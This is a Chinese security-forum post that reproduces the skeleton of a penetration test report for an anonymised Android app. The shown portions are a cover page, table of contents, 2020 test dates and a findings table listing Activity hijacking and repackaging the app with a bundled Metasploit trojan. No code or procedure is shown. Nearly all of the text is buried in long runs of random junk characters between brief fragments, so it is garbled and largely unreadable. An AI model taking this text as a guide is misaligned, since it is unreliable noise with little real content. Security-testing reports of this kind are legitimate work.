找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创-app客户端渗透测试报告之反编译捆绑msf马二次打包 ...
返回列表 发新帖
查看: 4720|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
, _, R9 X9 S( N& s) }! z$ K3 F& W + M5 u8 y; p( W. M: I

8 S s. \$ e% O; h 7 f% }$ e; h& | l( |3 n7 u0 j
' J& i# C. W9 h4 p$ G. g4 ^6 m6 p ) M6 k; @3 ^$ @+ r0 Y

, Q% Z+ C+ y6 d# R/ B5 c9 J1 @9 N V# `3 [5 Z2 ]3 R; _6 S) s# k
0 _2 u0 N! Y' C7 N/ u& u/ K 6 O: A% E. L* w7 r. [! g g

' B" a; w. Z$ z% P" v/ [- U 7 m" R0 ? Q" v. W5 W( `; p/ Q* X. r 文档编号:                5 m) F) S/ {) n. f5 q( }. A4 C2 w% K1 B4 P4 I

0 D# V: S3 Y i7 e ) A* ]+ W4 I* Y7 Y

" [2 v5 T* H/ l1 [- h% e/ o E+ `# u' V4 D   4 w' a0 Q$ H: V( R3 g ) U1 J# @$ _- x4 T4 z$ ^

4 e* I- I" J* B9 e" N- u ! ~3 M0 v5 G! g# p. \8 ^) _

T4 ]4 l4 f' J: Y ; j; a# \' O6 f5 W   # I. E2 B3 B9 ^; _% w 7 g7 ?$ e% d2 B7 @( M5 g O# O9 V

7 K# |5 D& V* Z4 Y0 m5 v/ D* L7 m6 c, `* U

* C q. X( k& V4 ?3 b4 S! g: w G1 K- V/ t9 }   ( c! W9 r" G3 [/ ?/ y: t; z& k# X7 s5 _3 K4 R5 ~3 E- ]' H

. V4 D8 v7 K, A N$ T $ m" C. q; q. g: r+ _

: i$ W1 p' H9 k * { t) [) v4 d% p: F. d; p: ^" a   ( e) F2 ~ k+ t. t" M* V 0 A5 z5 Y6 t, [) |% G+ T. M0 E

) T* Z0 X8 y5 H* d ( \: u: T1 j @$ A) {6 L0 L

3 N# G, x1 j( X7 X/ Q8 m% o/ x 9 l L+ @3 _) Q2 z7 j   8 R1 d/ D7 b! {1 N 6 f; V, \/ ]- U/ o6 ]& A$ |8 T

: q) }. [' D# H2 M1 a+ v9 D1 a / ~/ e+ k) T( M6 r4 N& S# p {- M

; v7 h7 J/ I- L. j$ M; D$ p4 t , R9 N9 x! I; x' U/ t( ^* t; K3 t5 K 某某某APP渗透测试 " n5 }1 e* p$ h * t) n: I, m4 ` y4 X, l$ q$ z

( m: t+ p6 c& F/ a7 c1 M0 c. \, J ! i! u& V# F, B! x, t

: G( X5 W; G# C) Y. W! U6 d* J+ |7 A/ o/ t9 m   ! G# K3 j) r2 ^* m: h- f0 }+ s9 \ y

% B" I$ V: ?$ o3 ^ ; d8 Q- E& h1 L

' F1 G. b4 ]0 H# D1 a" @8 x4 b ) x* k7 m; {( \; j   , k* u2 e; s/ ]! Z) Q' c% O 1 a/ ]6 o" ^2 E i

1 @3 L6 r X0 Y2 e # W$ v. O) x9 \. ?# n4 n3 c

2 t/ k( ?/ j' G- q0 m # I" V6 x7 ?' n; Y3 q5 e   - y+ q [% ?. D: q) U & R* M! ^% K' F- `/ G

# r g$ Y1 ]9 t+ r+ r$ M, R% T% S 8 A/ R& e' S" p3 W# l

+ }4 N! J+ b& Z/ Q2 n7 I( T3 u. B0 M( I3 u2 K0 Y/ \" _   1 h: C" @0 h, S$ k5 o3 F* K8 g 0 I7 w; A/ B, o1 D- R

Y+ X5 k, C6 B . I2 p+ T0 ?% J, v5 d

8 h9 ^0 R' w( C9 t5 N C* e( F& z/ M0 j: h& f/ _, F 技 术 报 告 0 v" B O* i6 A7 ^7 q0 w# n# Z) }3 c $ H& U4 ?7 w. v) ?" _5 b; G# b4 d

' G; e( h/ [- f' F; k- N " |% D" J& Y& W9 d

, D$ z% c l' p8 b2 s" T7 J 7 k# P: N6 H$ c   ' q3 B a2 {0 e- w L. h( U ' `/ {6 D R N) Y* D. E

$ B; @; _9 K4 O! H# a4 x: [4 w* Y) ^) o5 q6 D" y. I* ~+ m9 J4 F

* O& U: {4 i2 Z0 U/ r& R ! {# ?# }- L+ B. X4 \1 \* o4 I   ; j) R% r* H& I3 ?$ h+ v( C 4 ]1 Y" o1 f0 z0 z

! c* ~& a$ V* u4 B2 [ ; B. P* J# [$ y, m' E

$ ] L; [% d" `' L3 { - \) U# G# M+ y   . _7 d; ^& B, L4 f7 o ' g1 l9 T: g! [

9 j& w6 P/ y, L! M* y2 A9 { + r9 M0 q: @# g6 [& F

! y/ G4 c3 u9 E/ {+ m" K5 b8 o1 x! C/ C( }" }7 y1 g' ^6 V( j   " A; m" F: m1 v% e9 B . S* I' } S. D2 G; a4 X& B

7 I( A( G5 g/ T2 e % ]3 p% m! X1 G1 K* d- K5 ~( i

7 x" K( w; `. c3 d Z# M8 H + I' R' [; P# T6 `0 `$ j, f: r( i   , o8 l- e6 J( D# u y. J0 C/ Y2 y+ Z3 k' g* h: I+ C

# m1 L. S0 o1 s X3 w / E' ?# Z+ V7 y, l4 [

" k# Z# ]+ m L# R7 @; r4 M7 h : c3 ?2 w. r- b   c& ?; C" }9 ]" E' @ ) q, U+ I+ [/ u/ X7 D6 g: P" \

r) A! ^ l; h9 j & a- L j; H) }, f/ a

- J; n$ M+ h8 T1 T- o8 v% B, ]' j1 m2 ^$ Z* J   3 \' K. A# r! F: o. M * B& b* b( Q: k( t" [0 @

7 H2 Z# f9 v) D* z h* O6 ]$ |4 K8 o- d# E: O0 G) S

9 V& q! e5 i7 V4 X- t& ?8 c: v 5 D+ m2 Z. P1 v4 t' [+ ^+ ? \1 O9 Y   ! z" f1 t2 T/ r* c" t6 v. q3 h$ F. t& G* `2 d( h

' f: _7 J0 R6 X, Q4 L* u& E8 V! F& H

! j5 ]& K1 f0 p( x ' |: X, u, Y0 [! Y# U; ~* @6 K, ~   3 o6 O* s9 Y. _5 ^: U) Q, f- |; F+ e/ a0 [; w7 Y' D

2 \* I6 e5 a% g/ y: \" S) a6 S+ ?. b5 ] - ]" V0 W* y. \5 Y, B: A# _

a7 Z$ q- I/ I" Z2 O' V7 H5 X/ ] * C8 |- b- I! I4 ]   3 h4 F/ \ e" W l( p7 r& ~( ] 9 ^2 e* A: n4 [, b c2 Y+ ~# t

. M0 |7 F, R# a) {' E; T 1 {5 j' E% n* Q& E$ h, E( D- s

0 m4 Z* c; f5 d+ B : S5 E' z; {0 Q0 i1 `   3 H' [! R! a, n% i+ I: C! z * Y+ {3 @) f, m- d5 h; W" @; j

: L7 p( k/ V) I5 v+ X( L' v 9 }$ ]7 A2 |" f) I

' K( m8 d% Q: t# ~) x/ G$ u3 o; D' ^7 Q% b4 K; W   7 s$ b: B2 P) ~7 E& t2 D" v ' R x0 F: }% j5 X

1 _, v6 _3 Q( f0 T. l ! l4 o$ ?9 B1 ^. W

5 R; z7 T h4 I N9 @2 F4 f* W0 H   * C/ d- s9 v1 L& T1 N' ^ 4 J' s0 z6 l* s0 q6 J( y

$ B: s( z. g+ u1 D3 s + d W/ M* Y5 N9 h5 a, i& c

. @5 j! x7 e3 d3 U' n * W* {6 S% }: r2 J( t" ~   . v" O$ J* _+ b q6 t2 p R : t, F) z8 U8 C

' D0 B P8 C% ]; r: y; \" {$ z. I $ f" l* O& t7 |+ G* f$ F

/ P( a. W5 k: m! k, x! _ . s' [! T1 e2 K" S   5 |. X9 o5 x+ o* I' V0 {# L g 4 R9 `4 K6 J; a% H" v+ F8 p* {' p

4 K; P v- i4 J* i% c 5 ~* [( N1 m0 t$ {' h6 [0 r/ Z

: E* l1 Y+ b$ a; b/ @& y& N; p' M9 f! }   ! T( A# F9 h7 {8 l( i % d5 w4 [2 @! o' u9 B% T2 x6 L. K# _

, e4 Q3 Q) m* K& F7 z, ]' k8 l* m1 H* ]: _4 Q' t* T( b

. b K1 ~5 }$ z2 b" i. b 3 E( d* F. l4 O! f& o- x* j0 j   2 _; N& G6 j- X3 y& E4 D' b) l( n! R6 a: Q/ g2 G- A# P

5 [' E7 F5 o9 q; P/ u: B. g9 u! ^) `# A- x' [' v7 n1 {

* x$ k) j5 g0 K* C2 ^# { " d' w% R k4 ?& k   6 x8 r! n8 M; v0 J; s $ k! ~ p' d8 y) Y

' Q* Z7 Z1 f1 F# Y. M. }) W) R , I3 o( a0 b* W$ M

; r& j2 r3 L F3 i% q+ }8 z3 o9 y9 b1 W$ {. a8 @ 二〇二〇年 & g. `* t2 z( ]0 F" }4 P * X/ [ F- k0 f# U6 |( H8 d9 J# X

9 J; ^# O5 d2 ?" j a& A: m$ h' [% R& Q0 ]2 m( Q2 Y; b
2 E1 i% C; b, w [- k; D, R) }: p1 N' n
) L8 ~( [6 U' r* V+ I6 a7 c; Z4 {1 u% p0 G 5 R, \/ {+ c7 k9 F 5 f9 z6 s! p8 t# ^4 R1 n, J
0 [6 f4 n; A9 s2 | ) l+ Y1 s7 e" l4 p9 J
) A: e9 \' ^' x+ e: y; C5 ^ 8 K" s) p7 m: }/ {1 i
* E/ c, o( u/ J+ [4 P( `; Q- q+ s8 |9 D* U0 h( w; l * r3 Q6 ?" ^. c1 m5 D & r F9 H3 N l* v- _- s7 U% p* X
j# I/ E/ V! ~) p8 R+ i$ F1 |* F( {# L0 h 0 z( ~# i; U: H$ A& s# T2 P0 q, J

; B( R( h( Z+ ^: X4 q3 H2 W3 q' t3 H+ M: ], R7 I$ F9 @% c* k# { 目 录 1 ?2 j, V3 k: }" x, ` d / v0 T( _2 y E

, B7 h- J K; I ) r" {& X0 s) ]( y* H # X: U/ S& W' C# q 6 r8 d6 {! ^4 H$ i+ A

" j9 ]& n5 k. S. X3 Y5 ~9 l5 a- g, L) W   5 j* t1 K* L* I( j l + M0 x7 A( I9 ~ g d& w% d) @& T" q

4 Q% R" S, c# D' e! A5 H/ @ & @: _3 z3 {4 M1 W

$ Q2 A4 O+ D2 _9 g $ Q: r0 n% m0 A" Z 1 概述... 3 : h+ Y. U8 H* E6 n9 V; P! Z8 W4 X* L+ r

$ o6 @" I8 {0 M* j " Y4 ?) I1 [' g% M0 t7 n& O8 |

- ~! D! L5 {) {- v2 h& l. o* J; | 7 R) M/ E7 }4 S. ?; X( { 1.2测试时间... 3 ; ]% l& X, \4 R% ?! }% T# P# ~ : X) x( W4 c! f- g- e

. b: U2 s2 X" j # q3 {- L4 p$ i) k s, x9 P

" f4 `; @# r z, ?( D + p: K7 g# A% k( f 1.3测试对象... 3 - s0 E; h4 f- t- m0 B , A: P! Z7 c! m/ A+ E9 \; `0 X6 y

) K8 Q9 P% C+ A4 [ ( g9 C% t8 m- \% k' {! A

9 C6 |9 G5 M0 M3 Q) n8 d0 |' M- Z. S$ B6 l& o+ @ 1.4测试结果... 3 % G, e! T- z8 S7 G$ y : V! H# X0 n' Z p& N0 L

# G( `- D( w1 G: _' R $ B6 }! J5 g) I

$ O2 M, u& T4 D* v- w# z0 U% ~ ) \! A/ E0 J' Q 2 检测结果... 4 & ^, W8 x2 ~7 Q6 {' B1 h3 g9 @/ @3 P% N) D! ?9 i2 h' u

8 n0 V# ?* s. P" c6 P# ] + e% w* R1 r: k" m) [

# V% O( Z' c5 z( p/ S9 `& _ S0 ] 9 h9 H% E; ^4 X/ {5 ^! e 2.1 某某某... 4 9 ^% l6 G6 C8 Z! Y5 W* U! [! l* a4 R6 X( Z7 z# E

0 S0 K+ }8 J, L! |3 f. u( _ ' ~6 S& `' H1 t1 O( O6 [9 i! Q0 c

- b8 \. w1 Q( E1 @$ ^ F4 ?; G9 U / I5 j W% a1 Y9 M 2.1.1检测目标... 4 + S7 q; H* A2 ^: W7 K / j1 ~5 t: j# c: y* q

' A# D; n$ q9 Y: D. b4 C+ E 4 N6 p8 F. Q! R6 e5 D

' ^! h8 \, _! Y6 p) s. g. I, N# x8 O1 K7 c# m) @ 2.1.2检测结果... 4 2 F3 x3 S% i2 t& P - o* ?) D+ ^; q! J" O+ F$ c) _

0 M7 N2 O( X& H ) W3 q( K- [$ V

* t' t( o) f* e) ~6 @ 1 ], T4 `" v' y 2.1.2.1. 4 / S0 `" l3 ^8 D8 k# E0 t7 | 3 |: ?" Q; w2 i6 A' R, p

: ]! g7 C, r. I- f9 B6 ^) [2 `- Y. N1 Y( @/ n1 J8 K

# i- g; {- \. S9 N6 D/ N. A ; u- w% m1 x h) S8 @; b 2.1.2.2. 6 $ c% N- x6 q% G* { ~ 5 q2 R/ | a( J* E* w# W# T& t

0 a- ]3 R `/ ~+ E& e+ B! a & j/ a. A+ l% f- f! O8 i! V

# p g$ T3 [8 k# M4 E1 c% z, i* M4 H* o* d8 D3 L( t( @. y5 z 1 Z8 V$ U9 V& x: b8 x 6 R$ C% _7 ^, g% \' U$ ~4 F. Q: W

: C' e; ^+ \& g; G* l% I: D, V# C- _" g M# | ) y# W7 o5 a7 X" | ! \# m4 A0 K9 n ?$ v& U0 R. U
& r6 i: y, D2 V! v# n, u7 X. g% g 4 [- U, `; O) ?/ k! J$ s
$ u$ z2 Q& o" o m& J% B3 ?1 L @" ?1 o # I& z: I7 @0 u, |5 J3 b + u. Y% e. G1 q L$ l

( l# N7 q1 ] K / P" q) |. _% H1 F, j' l 1 概述 3 _% h* T- f) ~6 T( T/ F1 V % R: ]0 T% K& O _

/ b% A p0 ?2 g7 ~8 l5 p g* c1 _

' r4 U" k5 g. n$ ]5 ^1 f % U: I* u# o6 ?4 A4 @( B* s 1.2测试时间 % r" o+ ^/ \1 S 6 r; Q- `; t/ d/ e; O

+ V; e$ n' H2 K* j! D' Y 4 Z" x# Q8 ~$ `0 W ! D- h7 i7 y' ^) h8 T! j0 c+ o2 j. S* r8 R" }$ W' @) F; G( u# I( u# q5 P/ S$ L0 `" u2 p9 S6 j# N0 `5 c4 |7 ]* m* I& O* B# G3 X( A0 P! z2 [' b- O; u N( E/ V9 ]" P/ U4 J0 y9 ~* n3 b! G. r U1 U5 n8 K/ {. q, _+ Y& ]& o- X* `3 Q! d- z% T8 H& N5 C% A0 s3 D* Z4 L0 V- K) i# G5 i. u$ K5 N( O, O5 F! t" G8 i1 F6 v7 ]7 m" g4 X8 a4 l% O3 v' b( [. d3 [4 E. X: x! X$ @/ A0 |1 O- K$ T6 |7 k' H# B! P8 P- J% |6 L' Y7 q4 a5 D- H# N: ^' p8 Y* ]9 u+ r+ [/ G/ g" m5 P4 Z: V2 i7 F+ y: ^' Z( N# n0 U; M) X0 j: G( E V0 ]$ o. s& t/ }+ \; Q! y" K+ o% [+ F% Y! C. b' E; Q+ F- G# q- Z7 z2 i/ B0 K+ k, o, Y* W# j Y! y9 M' c- R' d5 H& B$ ?6 A/ \6 O% }/ a {3 b# I# a2 ~9 }/ }7 w* w
+ o' A7 ?/ |: c) | . G; Z( k* V- l0 |9 r- y* a1 v, B, {

, c1 k4 V5 H; d5 s2 x- J6 { % N0 Z7 ?$ x7 q5 R8 D7 c8 X 渗透测试时间 2 q/ g) P2 M' g# q : L1 P$ @8 F/ X! ]& c6 B

% Y0 j9 v: p* N2 p: v+ j / i+ T1 B6 U! y+ L/ A5 {
8 u7 C: x. R. g' q- D0 H9 B# C ; u3 A5 a* H z6 L0 d& q3 Z1 |

0 _2 H3 {% Q/ U4 m d I: {7 o: \ - N* R0 O$ B2 z 起始时间 ]8 W& L' o) b1 w' O, Y5 a" F 3 f7 L# k9 n5 ~$ A2 X* U b

8 D u0 x# C9 t9 e4 v! f' T 1 t9 X0 p- g" C, W1 i! t 		. S! I' _0 k0 d# e6 l- g7 E / b. n9 i3 ~- I% b4 f; u0 O: g

) r" O- }# f; q/ V; P7 b . @. e& F1 `4 Z4 M9 W, M% G 202046 ) a* f# S5 s0 F! {# @5 n4 V 1 f: {- F* y F; T9 f/ l* |( a, [

. z, k a) s. B& A0 t/ l! c0 O/ I. ]) Q
1 L/ L ~* H; w9 W 1 Q% `, R* Q# t# U0 I) G3 t

$ k8 Z& ?# V. X/ Y0 P W5 n E2 i' Y: Q6 |4 M- Z. k, ~' O 结束时间 * n/ ~* `1 m* a : i' b8 R: h% D; I; V* T3 |

/ R2 O3 R5 ^/ e1 R9 @ 4 g5 A" Z6 W: h/ j 		9 [* p3 ]0 g; } 6 g6 X4 d9 j' q4 n [

) `6 s1 V3 W3 i0 q' t: v0 N ( U: X; l( I( q `0 H 202049 ( f+ A- B& T. j* @4 W: ] 4 U1 h) Y* F: M5 t

! n7 p- R5 U; `4 v& @8 R% ^ # k- Q8 l- `! ?% A8 r5 H( E1 G- \
8 P, _9 \! k" N6 e3 q/ J ( b% g5 I- `. S3 S' r

) O/ W @. u, J) o: `& k: B9 P4 n8 K8 j- J8 Q- s 1.3测试对象 ; f- D) L9 N4 S* x& r& [- z; x , W( j0 i4 H$ `4 W

5 n8 k& H) f% ^. B8 S) T- Q3 ~3 E. t4 t: @

* w/ I; H/ O6 G% O+ K1 n; I2 p! V9 b) g+ `* w9 N" t 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: 7 d: }0 }/ ~% K $ k) X& H: X! h. L9 l* F

' ^2 \8 H; H7 {7 V' L , a5 J$ c2 @7 o, N2 }2 P* q' r

3 J% G# C- Z7 k; A1 _6 u" d1 R $ `, I) t- }' \6 y" { 1-1 检测对象 0 S) W% c2 `3 u5 ~# j" U3 u5 j! W; t1 Z5 K t$ O

% m$ M; r& ~( i9 q6 w5 [" k $ h1 V$ }' X) j 7 [% X! _' Q: E, H5 k# Y) e+ _2 e9 s' h! z3 X& B5 Z- c+ _8 L7 i% N( o/ y, V, Q, x& R, O0 Q% k5 i$ B# Q% l8 c/ H$ F& J8 t# [- i5 { P. Q/ k4 H3 e+ x6 S7 u0 `7 V0 _/ E) P1 ^5 B' V8 K$ ^+ ?8 r# ^; X2 o3 }; B( s2 k$ m" w, `0 T# e% k6 h5 ]9 _ G- ` o$ {! t/ E# @9 O; Y5 ]6 p. o) P$ K$ I: x( F& \: H/ M7 e5 j9 j1 k8 i/ G! C3 g; C. h' t, X5 U8 Q' a& E$ o: l/ g/ Q- d s& N) I: ?1 e, U( D; ]/ _* q& c0 i. a: B9 l$ D; i; ^6 _3 U: ~' U7 j) E. n- w3 y* u- k" `4 m7 c# s2 C8 Y! B/ ^$ z# H; v( n, D1 F' L8 N" e" S, E+ Y" w+ [! B3 u: u6 X$ q& H2 ~; b D3 X; ^' v2 ?" C! N T& Q2 P$ s% b+ p* j1 p+ F! u! n, y4 A0 l1 R9 g+ j7 L5 w. Y T4 _0 V0 T5 p' ^% F; a5 o% J7 l* B; A' f) H* ~4 ?1 H7 _8 T: Q6 x# p& D/ f) |6 S; _; x/ X- F' Q- n/ B( b! u5 l+ I% K) s; Q" n. s0 G7 {
. I7 r2 h6 |, k7 f! z ' z3 [* M# x- I8 z) W

8 v! D- v% ]- w- S1 C3 V: h1 J; x! l! ^) h 序号 . ~3 V# E0 h2 c8 N 3 t& E" n( i/ M7 f2 T0 ^

) W6 [" p4 J% {& i; ] ( y5 l# O8 D* c% n$ K- l- T3 @- q 		3 l+ j5 K5 ?8 F X: n, Y $ R- t) i8 e6 F& i! f. ?

|( c: R$ J' v* ] ! J+ [& k; J# P4 l$ a. M 测试对象 & P3 [0 W5 R6 O8 @, d; ~& G- o& g! K% m

Y. h2 k" L [- s1 H5 }. Y; c( R* y 		1 `7 B- j9 I+ q* F* [, j: _& d6 Z" s* I' b

3 Q) y. |) F4 L 7 y& f4 \! E3 R" ^- ^* M1 O$ n 测试地址 0 J; F: v4 L! {! n5 b6 g/ b % n! R# a6 J) g; C

+ @- @ m& _ u. ~1 \4 ^3 c& I . K7 F y& f9 L; [' ]) ~ 		$ h @5 @5 w! ^3 |( `7 |( P7 y+ o% w) h5 X: `% S

) M. P/ k! G5 l8 p6 t0 X2 P % J0 ?. j" b5 N, l% F 安全漏洞 8 K/ {' ]0 h O8 M `) s - X+ E) h* k$ \5 [: ]

4 ]1 u3 u6 g% c! A0 a# w/ k 8 D- i2 k# Y# J; j/ R7 j0 N
1 E! z) D% ^, c2 Y * Y0 ?- `' c1 S& _

H- C) M" X' G B: Z# W6 G2 f * C+ [2 k2 W- h& d* X7 ? 1 7 ~+ E5 Y7 k/ Q6 U5 m7 g) t! h8 w% F* o

0 T2 a0 n8 b$ t1 ~ $ a" ~# C8 I% M' w 		8 O& R- d9 j3 W5 k" g0 k0 i" H / m: Y% e1 ]4 b! s0 q4 M- ~$ P

4 ^- e. l, F \- w9 f) i 9 C0 u, t" G7 _# l% E1 Z$ Q 某某某安卓APP # r) k9 I8 {* n) k/ @; b N Y7 N5 s; |" \. I- B& h* I. ?

' y& A" o5 i8 O! z$ U 4 n8 W* G P) E6 i/ K! U3 t3 ] 		/ Q. d3 Z* b+ L : r$ e( x) k' y" s* g# y+ C

! j" [1 d% F, j4 Q9 @7 N" u) _- U1 N. O& F2 j+ p! r   , n* h5 a, [* V0 f2 E * C* ~' l3 ?6 e9 g* z- C

; ?- L( k) G& d7 i3 u2 Y3 j5 Y) W% G6 C4 T& V 		3 U z3 e% h% M( h' H# o; N% B& K1 k% l- t q: n3 G! a

/ q$ _4 h8 N! S# o ! @! t! Z2 |2 R- ` 2 " R1 D1 y: C% s$ n/ p # h& \: S2 v. v) W" F( C

z5 i$ R e3 J! ~: o/ j( p2 ?7 [) Q
' e3 P8 x! L( H6 Y# A# w T* [7 h/ |0 N: n% \

) c& L! |8 X6 Q# R0 u ; f0 s% T# e8 H: {4 M( v+ P. p 1.4测试结果 4 Y$ ]0 ]# C: R6 p2 z6 w / W' g8 }* k1 M; y2 i

0 n2 d7 J; s/ Z) S9 G/ \ 5 j& Y6 K* l$ o7 Y n

) z' f4 `6 v# m, r) |, n & d3 K2 M' e+ B+ h+ q; m 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: * v, B, Q/ l: _8 c9 E# g 0 P7 U% {$ ~& x/ f$ `& {/ b" ]

* ~* k; t2 T1 R' s* y* ` ^! t' S* g( B. `3 O* D+ ~6 c

1 b/ ?7 W: t/ h6 \ . n& I& \. f& ]8 W6 S4 j$ |   # j# x& K4 b$ K* N T! B% b1 V0 B; g1 n7 w; a6 f; f: p

* z2 O+ J& s8 k! u + k N6 k6 k7 l0 u3 D. M1 `9 Z
4 U) G! E& A$ y- m # t0 p0 |" C. C; c8 Y: Q; J A: H 7 ^+ C' \4 O2 g* Z8 z( k, v# \" [ _/ z& E2 S# `: S3 s* t; V) s$ V9 q& \" Q% I, G3 p5 J9 L8 t$ B' f8 o, F, i1 i5 \) {9 `! o, E& W* v% w+ V1 s& b& Z: D0 m& D+ {+ ], P) }& b5 v. j4 f' `9 v7 o3 _. L ^0 k3 r2 I* s7 P3 p& y/ x; m1 O H4 ]4 w& W' V5 d2 a; f1 v# V9 h& [4 j/ v' I5 h) Z2 G4 s. S# ]8 F) M/ D5 p1 W; F: }4 k: ]; E$ b$ O# R9 `4 R! u# g3 E% h8 N2 w& f z7 v1 O; ^7 S) w' T2 V$ K0 B: j8 J5 ]+ U. \ A, T+ z+ f7 q0 U5 P6 m5 B$ m$ {3 k& A/ |2 p8 r# P0 A# O* o; G& }8 j# l8 c2 }0 g2 v7 }( L) y& H1 N9 R) ~+ X5 f$ j' z6 Q Z+ [. K1 J. @3 K5 o( Q i, b6 k' S6 r+ `# y+ c+ Z* [6 `0 ?2 \! A5 p) [! V) M% t9 V. L4 c `0 h1 G5 S9 t9 Y3 _6 Y$ B+ m$ T( Y9 L/ r3 U& |4 t! K2 n E& s7 \5 C% L( {: g- X2 B8 u! q5 p4 Z. U; l2 |1 i" ~7 h) J% [0 N) I* |) `* d5 J; q5 D0 W: B+ S2 d( c4 v/ ]0 [% C6 n1 c+ b# u5 }# g/ q; b0 S# ?* r3 ^6 c; E3 Y: {) {. X9 S0 ?/ C/ y2 N$ _+ j! L" [& s5 Z3 M. k+ _5 U( }% k' q$ p/ Q) U& J9 G5 y6 W3 `0 w1 q0 ]& o- [$ n+ g$ a: ~- y9 d! k2 D+ R: K5 N6 e6 b$ {" U9 o) {& I7 c- X8 G; ?$ F( K- K; I. }$ d8 f- {. t; Y5 [6 B, w2 ?5 m2 p+ v( E" [1 r, R& a( Y0 Z! W$ _7 u5 Q, Q2 f9 v# M! H/ n& c: r' y( ?3 F. D0 L, I* {
# D& v! G* B; F _/ M9 H$ a& E o' {' Y3 y

0 {& \% @7 G" J/ ~) Q ; l! a9 D, G: R8 R" R6 d& ^ 序号 ' i2 S, M( P, b& E7 R, _0 I5 r3 ^4 _$ N' ]! ]' Q

8 @# C- [$ ~4 E% l " o/ b4 X' d; R* a7 P 		* y7 [2 R% \- t. v8 R2 x* h # g! I6 a! W5 P+ ~" [

8 B5 a& ^0 j, H) N" K8 y" w9 ~6 q8 v9 |6 l 系统名称 - O# D8 d0 \+ p! e/ k+ l9 H/ F* m5 H1 @' G# s9 R

( s: u# G8 f0 c, m: i - I. [- @: r" N+ ]5 j 		" W+ P6 ]9 U& [8 F5 F% z6 @( e ( C, q% H" ?( v5 u5 T

. [' q- z6 W) {( w C1 j% X6 w! J% J 漏洞名称 `1 z0 A- U* F* d0 `3 p! g 8 j) ~: T% z$ s6 |5 ~

9 T& g5 |2 v$ b$ h: B. k7 }: q# \3 e* t8 F7 g6 i7 `4 s 		) A5 ~# G! Y4 S2 v1 R9 t1 V 6 a5 w9 V6 @ U3 j

% z+ i1 v4 R# K5 h0 Y& |+ w# \ ' ^7 e5 ]# t7 B) E 漏洞危害 5 J% h4 h$ {% I- W; P" G$ ] }8 c

! n; Y# e5 ~8 N! L 2 \( i* h+ g' h' {; V0 x 		7 b0 j: Y# z! D! N/ F2 ~6 x: ?: F }' p$ \! d9 o! ?/ S6 T

6 a! e) }. I8 E+ m" T 2 c# o7 s. w- V( U* L; w9 A1 I4 b1 D 修复结果 & n" o! r6 Y5 P6 p ! L/ s4 N0 ^, l) D; n+ R- u

# a: Z; O/ l' p( J) E2 f9 x; ]- u E- C2 f5 ]8 n( f" C. u
7 [( E+ x1 g3 L! O7 S% D7 R# B , m- ^, d6 f6 s& |2 D

2 l0 G/ s- p/ u6 ^# B! q! r$ m 9 S9 D* u& w. A& L0 y/ u k 1 % }( M" v0 E% u, s& U; c1 c+ Q2 B0 P1 z" e; T5 _

0 K$ A8 P9 [9 Q* z+ `; I# m- P, I) l / ?! W! z R& |: ]/ K. ~5 N) I 		) h2 ^& r0 A \$ k( O. ]2 v& `6 ~% u% p

* Q( f+ F9 h# ^* F) d2 J : {/ e) a; e4 b( \6 U 某某某某某某APP 7 E5 \6 |. o8 J2 |: \6 @( R5 T % i4 n% O7 M3 {' M% C# z

: S/ w+ G* |4 n3 L* F9 Q1 o G5 R- L2 P6 L- S- G 		1 V* z( P% |) @6 T2 |% u1 g ! F7 ^+ r/ `8 a7 V0 t

+ F* h! v7 l+ @ - [" u2 m# l9 S$ I! o# m Activity 劫持 5 j( N" C U6 Y9 u / z) ]* c5 C! U

( e c- L& ^1 M9 G3 C0 {( P6 `" ^0 O( V) U' K- ~

9 e: v3 |4 d/ [9 Q, z # ?. ]1 U( A. r& m   : O! ?; i7 ?: V/ k" F 5 Y4 S* m/ F7 F% |7 l

# _! }4 ~/ } B2 A; X 8 Y6 h& [+ y# d, X% K 		* ]7 ~5 e! ^2 b8 E8 g: e+ i, e0 u6 A9 p, H1 D1 e% z9 O

6 x8 p" r' x% O $ x |. v. u) E' \6 T " M U4 {2 y5 J0 O7 N* k( \/ i 0 P# l, W6 t+ \' @+ L

1 z% r8 {7 e% U2 z ?+ D0 k1 i1 R- t2 o, H; _ 		7 E" f _# J. l, q ; Y0 E0 ?& w5 P" S# S$ p

~, z, f1 L n: E7 a7 y! n7 m7 n w: ?1 [   ' M! `8 \$ `! y( c6 p8 H! p9 X8 j( }

) v1 G1 ~6 f) B( W5 b' t( m, z: \
6 [& r) [5 A% B- K 3 q: i1 G5 a3 @

$ p6 Q2 y% w' n5 ~6 g 4 Z% X" w' a: P4 J 2 4 t% @6 c, w: `* `, _- k6 s H( O" j# Q

8 b! F" H/ {, U, U& `- b; J ! b9 s, u) @$ u4 ~% v 		4 i+ }* G( d$ W: ?6 \) h H: P% `" H x

$ d. Z: M; `* k/ |1 [; F D0 W* s $ p2 h0 M) S4 w, H/ J) k7 m6 }6 z4 h& J 某某某某某某APP + k2 m8 T! a4 x$ @$ E3 Z( p# J ) G/ {: e! V @2 A' m+ d% R' s0 h

8 }$ K+ z5 ]3 P- `& s" c' f) u, r( O7 ]2 a 		6 r9 f5 a" Y/ S/ Z ! p+ I, V, n1 R( L

2 D5 p! r( g. Z; R9 h" k# o * p: E0 I6 f1 y6 ^- `$ | 反编译二次打包捆绑木马、篡改APP代码 ' I! M: k( ` Z6 l$ D6 R6 R" R7 c7 \2 U9 r7 ~7 @' j

* V F9 a9 p; @/ F7 ] K; p. K1 ?2 f# t; h 		# y+ S3 P% h: j9 P" }! t" U, \& u8 m: `, n: \

+ z2 w H, }" U7 D7 B 1 u; Q0 U @2 c& n3 f9 s0 q ! n. L9 K( K1 c( Q2 r$ }2 [9 M" M% `7 H& D% {; f

B, E7 W3 b F ( ~+ q( m5 k e; _8 z0 ?: ]8 s 		' {9 _4 R" s% i* Z4 C3 t0 O6 m1 o' L _6 l# ?9 ~9 ?7 W

2 a4 h6 }" T4 @ " j& s2 L$ v+ |2 M0 m   3 f% m6 i0 G2 O! e$ K5 p" K2 | 1 |) h& a4 N+ O9 \

" O/ }% m* p& d Q; t# U% O 7 d/ g$ j& p3 v# m* y+ K8 E( f
